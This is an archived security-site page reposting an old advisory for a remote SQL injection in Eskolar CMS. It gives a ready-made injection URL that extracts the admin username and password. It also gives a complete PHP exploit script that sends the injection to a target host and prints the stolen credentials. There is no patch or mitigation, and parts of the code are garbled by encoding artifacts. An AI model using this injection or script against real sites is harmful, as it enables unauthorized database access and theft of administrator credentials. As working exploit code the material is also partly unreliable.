Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b06-4848.htm

Eskolar CMS Remote Sql Injection



Eskolar CMS Remote Sql Injection
Eskolar CMS Remote Sql Injection



Hello,,=0D
=0D
Eskolar CMS  Remote Sql Injection=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D 
Email Address : security@soqor.net=0D 
=0D
=0D
Remote Sql injection :-=0D
/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*=0D
=0D
Exploit:=0D
#!/usr/bin/php -q -d short_open_tag=on=0D
WwW.SoQoR.NeT=0D 
*/=0D
print_r('=0D
/**********************************************/=0D
/* Eskolar CMS Remote sql injection exploit   */=0D
/* by HACKERS PAL  */=0D 
/* site: http://www.soqor.net */');=0D 
if ($argc<2) {=0D
print_r('=0D
/* --                                         */=0D
/* Usage: php '.$argv[0].' host=0D
/* Example:                                   */=0D
/* php '.$argv[0].' http://localhost/eskolar/=0D 
/**********************************************/=0D
');=0D
die;=0D
}=0D
error_reporting(0);=0D
ini_set("max_execution_time",0);=0D
ini_set("default_socket_timeout",5);=0D
=0D
$url=$argv[1];=0D
$exploit="/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*";=0D
$page=$url.$exploit;=0D
         Function get_page($url)=0D
         {=0D
=0D
                  if(function_exists("file_get_contents"))=0D
                  {=0D
=0D
                       $contents = file_get_contents($url);=0D
=0D
                          }=0D
                          else=0D
                          {=0D
                              $fp=fopen("$url","r");=0D
                              while($line=fread($fp,1024))=0D
                              {=0D
                               $contents=$contents.$line;=0D
                              }=0D
=0D
=0D
                                  }=0D
                       return $contents;=0D
         }=0D
         $i=0;=0D
=0D
         function get($var)=0D
         {=0D
          GLOBAL $i;=0D
           $var[1]=trim($var[1]);=0D
          if($i==0)=0D
          {=0D
          Echo "\n[+] User Name : ".$var[1];=0D
         $i++;=0D
          }=0D
          else=0D
          {=0D
          Echo "\n[+] Pass Word : ".$var[1];=0D
                  }=0D
=0D
=0D
         }=0D
=0D
     $page = get_page($page);=0D
=0D
     if(!preg_match('/\
(.+?)<\/div><\/td><\/tr>/is',$page)||!preg_match('/\(.+?)<\/a> <\/td>/is',$page))=0D {=0D Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D }=0D =0D preg_replace_callback('/\
(.+?)<\/div><\/td><\/tr>/is','get',$page);=0D =0D preg_replace_callback('/\(.+?)<\/a> <\/td>/is','get',$page);=0D =0D Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D ?>=0D #WwW.SoQoR.NeT


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH